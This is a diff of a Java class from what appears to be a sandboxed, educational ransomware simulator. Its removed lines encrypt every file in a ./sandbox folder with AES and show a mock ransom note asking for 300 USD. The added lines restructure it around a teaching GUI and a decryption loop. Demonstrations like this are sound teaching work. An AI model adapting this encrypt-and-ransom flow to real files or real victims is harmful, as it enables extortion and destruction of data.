@@ -4,105 +4,75 @@ import java.nio.file.Files;
 import java.nio.file.Path;
 import java.nio.file.Paths;
 import java.nio.file.StandardOpenOption;
-import java.util.Scanner;
+import java.util.Base64;
+import java.util.Collections;
 import java.util.Set;
 import java.util.stream.Collectors;
 import java.util.stream.Stream;
 import javax.crypto.SecretKey;
-import javax.swing.JFrame;
-import javax.swing.JLabel;
-import javax.swing.SwingConstants;
-import java.awt.BorderLayout;
-import java.awt.Color;
+import javax.swing.SwingUtilities;
 
 public class Main {
-	public static void main(String[] args) {
-		try {
-			Scanner scanner = new Scanner(System.in);
-      Window window = new Window();
-      window.print("[*] Program running, This is a simulation");
-      window.print("IT LOOKS LIKE YOUR FILES ARE ENCRYPTED\n");
-			System.out.println("[*] Program running, Use ethically");
-			safteyChecks();
+    public static void main(String[] args) {
+        SwingUtilities.invokeLater(EduWindow::new);
+    }
 
+    private static final Set<String> IGNORED_FILES = Set.of(
+        ".DS_Store", "Thumbs.db", "desktop.ini", ".localized"
+    );
 
-			SecretKey secretKey = AESCore.generateKey();
-			String encodedKey = AESCore.toBase64(secretKey);
-			//System.out.println("[+] Secret Key (Base64): " + encodedKey);
+    public static Set<String> listFiles() {
+        File[] files = new File("./sandbox").listFiles();
+        if (files == null) return Collections.emptySet();
+        return Stream.of(files)
+            .filter(f -> f != null && f.isFile())
+            .map(File::getName)
+            .filter(name -> !name.startsWith("."))
+            .filter(name -> !IGNORED_FILES.contains(name))
+            .collect(Collectors.toSet());
+    }
 
-      window.print("Please send Your identifier key: \n" + encodedKey + "\nTo www.fakewebsitethisisjustasimulation.com/dont-send-realmoney/\n and send 300USD to unlock your files...");
+    public static void safteyChecks() throws Exception {
+        Path PATH = Paths.get("./sandbox/");
+        boolean exists      = Files.exists(PATH);
+        boolean isDirectory = Files.isDirectory(PATH);
+        if (!exists || !isDirectory) {
+            Files.createDirectory(PATH);
+            System.out.println("[!] ./sandbox/ was missing — created it. Add files and restart.");
+            System.exit(1);
+        } else {
+            System.out.println("[*] Safety check passed.");
+        }
+    }
 
-			Set<String> filesToEncrypt = listFiles();
-			System.out.println(filesToEncrypt);
+    public static void decryptionLoop(Set<String> filesToDecrypt, SecretKey secretKey) {
+        int ok = 0;
+        int failed = 0;
 
-			for (String file : filesToEncrypt) {
-				Path path = Paths.get("./sandbox", file);
-				try {
-					String fileContent = Files.readString(path);
-					String encryptedFile = AESCore.encrypt(fileContent, secretKey);
-					Files.writeString(path, encryptedFile, StandardOpenOption.TRUNCATE_EXISTING,
-							StandardOpenOption.WRITE);
-					System.out.println("FILE: " + path + "\n CONTENT: " + encryptedFile);
-				} catch (Exception e) {
-					System.err.println("[!] Encrypt error on " + file + ": ");
-					e.printStackTrace();
-				}
-			}
+        for (String file : filesToDecrypt) {
+            Path path = Paths.get("./sandbox", file);
+            try {
+                if (SlideContent.isBinary(file)) {
+                    byte[] rawText   = Files.readAllBytes(path);
+                    String b64       = new String(rawText).replaceAll("\\s", "");
+                    byte[] encrypted = Base64.getDecoder().decode(b64);
+                    byte[] original  = AESCore.decryptBytes(encrypted, secretKey);
+                    Files.write(path, original, StandardOpenOption.TRUNCATE_EXISTING);
+                } else {
+                    String enc = Files.readString(path);
+                    String dec = AESCore.decrypt(enc.trim(), secretKey);
+                    Files.writeString(path, dec, StandardOpenOption.TRUNCATE_EXISTING);
+                }
+                System.out.println("[+] Decrypted: " + path);
+                ok++;
+            } catch (Exception e) {
+                System.err.println("[!] Failed to decrypt: " + file + " — " + e.getMessage());
+                e.printStackTrace();
+                failed++;
+            }
+        }
 
-      window.print("Enter Secret Key:");
-
-			System.out.println("[*] Decrypting, Enter Secret Key: ");
-			//String userEncodedKey = scanner.nextLine().trim();
-
-      window.onInput(event -> {
-        String userEncodedKey = window.getInput().trim();
-
-			if (userEncodedKey.equals("qwe123")) {
-				System.out.println("[+] Correct password decrypting...");
-
-				for (String file : filesToEncrypt) {
-					Path path = Paths.get("./sandbox", file);
-					try {
-						String enc = Files.readString(path);
-						String dec = AESCore.decrypt(enc, secretKey);
-						Files.writeString(path, dec, StandardOpenOption.TRUNCATE_EXISTING);
-						System.out.println("[Decrypted: " + path + "]");
-					} catch (Exception e) {
-						System.err.println("[!] Failed: " + file);
-					}
-				}
-				System.out.println("All done.");
-				System.exit(0);
-			} else {
-				System.out.println("Incorrect password. Files stay encrypted.");
-				System.exit(1);
-			}
-    });
-
-			scanner.close();
-		} catch (Exception e) {
-			e.printStackTrace();
-		}
-	}
-
-	public static Set<String> listFiles() {
-		File[] files = new File("./sandbox").listFiles();
-		if (files == null)
-			return java.util.Collections.emptySet();
-		return Stream.of(files).filter(f -> f != null && f.isFile()).map(File::getName).collect(Collectors.toSet());
-	}
-
-	public static void safteyChecks() throws Exception {
-		Path PATH = Paths.get("./sandbox/");
-		boolean exists = Files.exists(PATH);
-		boolean isDirectory = Files.isDirectory(PATH);
-		if (!exists || !isDirectory) {
-			Files.createDirectory(PATH);
-			System.out.println(
-					"[!] SANDBOX WAS NOT A DIR, SANDBOX IS REQUIRED TO RUN THE PROGRAM\n Made ./sandbox/ a dir. Exiting now");
-			System.exit(1);
-		} else {
-			System.out.println("Saftey Check Executed...");
-		}
-	}
+        System.out.println("[*] Done. " + ok + " restored, " + failed + " failed.");
+        System.exit(0);
+    }
 }
